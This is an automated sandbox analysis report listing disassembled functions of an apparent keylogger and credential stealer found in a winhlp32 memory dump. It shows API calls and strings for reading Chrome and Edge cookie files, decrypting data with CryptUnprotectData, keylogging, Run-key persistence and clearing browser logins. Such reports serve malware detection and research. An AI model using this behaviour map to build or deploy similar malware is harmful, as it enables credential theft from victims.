                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                    • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                    • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                    • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                    • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                    • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                    • GetLastError.KERNEL32 ref: 0044C296
                                    • __dosmaperr.LIBCMT ref: 0044C29D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                    • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                    • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                    • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                    • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    • API String ID: 1427518018-1416487119
                                    • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                    • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 1818849710-1051519024
                                    • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                    • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                    • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                    • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    • API String ID: 1818849710-27424756
                                    • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                    • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                    • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                    • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                    • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                    • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                    • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                    • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                    • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 39102293-0
                                    • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                    • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
